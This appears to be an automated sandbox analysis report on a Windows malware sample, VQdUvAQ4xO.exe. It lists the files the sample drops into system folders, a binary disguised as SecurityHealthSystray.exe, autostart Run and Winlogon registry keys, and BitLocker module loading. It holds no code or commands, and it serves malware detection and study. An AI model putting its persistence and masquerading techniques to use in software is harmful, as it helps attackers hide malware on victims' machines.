                              Source: VQdUvAQ4xO.exe, KjovMP41XOEJkF0Mbpf.csHigh entropy of concatenated method names: 'MWs4CZx8An', 'F6648RecRK', 'VXU4INHtps', 'nKu4qp2aA7', 'D0q4WAHsyR', 'T714DuniAZ', 'swl4jeqXbd', 'p064N6sqHU', 'Kx54ZuAk2l', 'k974xQHpZE'

                              Persistence and Installation Behavior

                              barindex
                              Drops executables to the windows directory (C:\Windows) and starts them
                              Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows\System32\r6Lr6XbTWt.exe
                              Infects executable files (exe, dll, sys, html)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile created: C:\Users\user\Desktop\QCzpQABH.logJump to dropped file
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile created: C:\Users\user\Desktop\lkEtgbYs.logJump to dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile created: C:\Users\user\Desktop\WWtOxrLm.logJump to dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile created: C:\Users\user\Desktop\eTZddqfc.logJump to dropped file
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile created: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeJump to dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile created: C:\Users\user\Desktop\CEHidmAX.logJump to dropped file
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile created: C:\Users\user\Desktop\XOSeUCEW.logJump to dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile created: C:\Users\user\Desktop\wMeJBGvi.logJump to dropped file
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile created: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exeJump to dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile created: C:\Users\user\Desktop\NslYNyvF.logJump to dropped file
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile created: C:\Users\user\Desktop\dGvExiJK.logJump to dropped file
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile created: C:\Users\user\Desktop\LuUydMov.logJump to dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile created: C:\Users\user\Desktop\hJPUkngW.logJump to dropped file
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile created: C:\Users\user\Desktop\vSXJQEeZ.logJump to dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile created: C:\Users\user\Desktop\NClzZRhR.logJump to dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile created: C:\Users\user\Desktop\MGxYJULN.logJump to dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile created: C:\Users\user\Desktop\oiVTRNgB.logJump to dropped file
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile created: C:\Windows\System32\r6Lr6XbTWt.exeJump to dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile created: C:\Users\user\Desktop\oGDUNCaL.logJump to dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile created: C:\Users\user\Desktop\nluLvNRG.logJump to dropped file
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile created: C:\Recovery\0eDO5Zbs.exeJump to dropped file
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile created: C:\Users\user\Desktop\UdnONotd.logJump to dropped file
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile created: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exeJump to dropped file
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile created: C:\Users\user\Desktop\NnjhOJZu.logJump to dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile created: C:\Users\user\Desktop\xkMJxvqs.logJump to dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile created: C:\Users\user\Desktop\ezCDhkaT.logJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile created: C:\Windows\System32\r6Lr6XbTWt.exeJump to dropped file
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile created: C:\Users\user\Desktop\NnjhOJZu.logJump to dropped file
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile created: C:\Users\user\Desktop\XOSeUCEW.logJump to dropped file
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile created: C:\Users\user\Desktop\vSXJQEeZ.logJump to dropped file
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile created: C:\Users\user\Desktop\lkEtgbYs.logJump to dropped file
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile created: C:\Users\user\Desktop\dGvExiJK.logJump to dropped file
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile created: C:\Users\user\Desktop\UdnONotd.logJump to dropped file
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeFile created: C:\Users\user\Desktop\LuUydMov.logJump to dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile created: C:\Users\user\Desktop\NClzZRhR.logJump to dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile created: C:\Users\user\Desktop\hJPUkngW.logJump to dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile created: C:\Users\user\Desktop\QCzpQABH.logJump to dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile created: C:\Users\user\Desktop\xkMJxvqs.logJump to dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile created: C:\Users\user\Desktop\oGDUNCaL.logJump to dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile created: C:\Users\user\Desktop\eTZddqfc.logJump to dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile created: C:\Users\user\Desktop\MGxYJULN.logJump to dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile created: C:\Users\user\Desktop\nluLvNRG.logJump to dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile created: C:\Users\user\Desktop\wMeJBGvi.logJump to dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile created: C:\Users\user\Desktop\oiVTRNgB.logJump to dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile created: C:\Users\user\Desktop\ezCDhkaT.logJump to dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile created: C:\Users\user\Desktop\WWtOxrLm.logJump to dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile created: C:\Users\user\Desktop\NslYNyvF.logJump to dropped file
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeFile created: C:\Users\user\Desktop\CEHidmAX.logJump to dropped file

                              Boot Survival

                              barindex
                              Creates an autostart registry key pointing to binary in C:\Windows
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run r6Lr6XbTWtJump to behavior
                              Creates an undocumented autostart registry key
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Creates multiple autostart registry keys
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tNOtXAG6xwxcUNu9tjBaJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JOajDppbSkfqSPK1G9zAbHJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run r6Lr6XbTWtJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mENvqiIeFxJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0eDO5ZbsJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VQdUvAQ4xOJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tNOtXAG6xwxcUNu9tjBaJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tNOtXAG6xwxcUNu9tjBaJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run r6Lr6XbTWtJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run r6Lr6XbTWtJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0eDO5ZbsJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0eDO5ZbsJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mENvqiIeFxJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mENvqiIeFxJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mENvqiIeFxJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run mENvqiIeFxJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JOajDppbSkfqSPK1G9zAbHJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JOajDppbSkfqSPK1G9zAbHJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VQdUvAQ4xOJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VQdUvAQ4xOJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VQdUvAQ4xOJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VQdUvAQ4xOJump to behavior

                              Hooking and other Techniques for Hiding and Protection

                              barindex
                              Loading BitLocker PowerShell Module
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\VQdUvAQ4xO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
